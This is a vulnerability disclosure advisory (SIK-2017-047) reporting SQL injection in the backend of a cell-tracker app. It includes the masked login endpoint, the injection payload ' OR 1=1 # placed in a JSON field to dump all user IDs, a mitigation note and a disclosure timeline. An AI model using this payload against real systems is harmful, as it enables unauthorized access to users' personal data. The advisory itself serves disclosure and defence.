SIK-2017-047
Title:
Complete Access to all User IDs in GirlFriend Cell Tracker App
Report ID
SIK-2017-047
Summary:
- Vendor: SoftSquare InfoSoft
- Product: GirlFriend Cell Tracker App (Package-Name: com.omrup.cell.tracker)
- Affected Version: 1.20
- Severity: High
- Short summary: Nearly all endpoint yield a classic SQL-Injection by just using simple SQL-Syntax as a parameter in the HTTP request.
Details:
The backend is self-implemented and is accessable without any reasonable acccess control.
In particular, the login
endpoint can be addressed by a POST
request as follows:
POST http://****/****/api/login
{
"user_email": "{the user email}"
}
When changing the user email to a SQL-Injection, one can obtain all user ids
POST http://****/****/api/login
{
"user_email": "' OR 1=1 #"
}
Workaround
–
Suggested Mitigation
The backend is broken on a conceptional level. Please implement a proper access control mechanism. The OWASP Access Control Cheat Sheet may help.
Timeline
- 2017-08-09: Vulnerability Discovered
- 2017-08-29: First Email sent to developer
- 2018-08-11: Published